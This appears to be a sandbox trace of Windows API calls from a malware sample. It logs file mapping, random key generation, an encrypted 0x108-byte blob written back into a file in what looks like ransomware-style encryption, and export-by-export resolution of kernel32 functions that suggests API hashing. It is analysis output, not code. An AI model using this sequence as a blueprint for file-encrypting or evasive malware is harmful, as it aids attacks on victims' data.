[0079.022] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=102) returned 1 [0079.022] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.022] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.022] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.022] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.022] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.024] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.024] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.024] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.024] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.025] CloseHandle (hObject=0x464) returned 1 [0079.025] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.025] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.025] CloseHandle (hObject=0x0) returned 0 [0079.025] CloseHandle (hObject=0x460) returned 1 [0079.027] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.027] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.027] GetTickCount () returned 0x114c40b [0079.027] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.027] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.027] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.028] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.028] lstrlenA (lpString="kernel32.dll") returned 12 [0079.028] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.028] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.028] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.028] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.028] lstrlenA (lpString="ADDATOMA") returned 8 [0079.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.028] lstrlenA (lpString="ADDATOMW") returned 8 [0079.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.028] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.028] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.029] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.029] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.029] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.029] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.029] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.029] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.029] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.029] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.029] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.029] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.029] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.029] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.029] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.029] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.029] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.029] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.029] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.029] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.030] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.030] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.030] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.030] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.030] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.030] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.030] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.030] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.030] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.030] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.030] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.030] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.030] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.030] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.030] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.030] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.030] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.030] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.030] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.031] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.031] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.031] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.031] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.031] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.031] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.031] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.031] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.031] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.031] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.031] lstrlenA (lpString="BEEP") returned 4 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.031] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.031] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.031] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.031] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.031] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.031] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.031] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.032] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.032] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.032] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.032] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.032] lstrlenA (lpString="CANCELIO") returned 8 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.032] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.032] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.032] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.032] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.032] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.032] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.032] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.032] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.032] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.032] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.032] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.032] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.032] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.033] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.033] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.033] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.033] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.033] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.033] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.033] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.033] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.033] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.033] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.033] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.033] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.033] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.033] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.033] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.033] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.033] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.033] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.034] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.034] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.034] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.034] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.034] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.034] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.034] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.034] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.034] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.034] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.034] 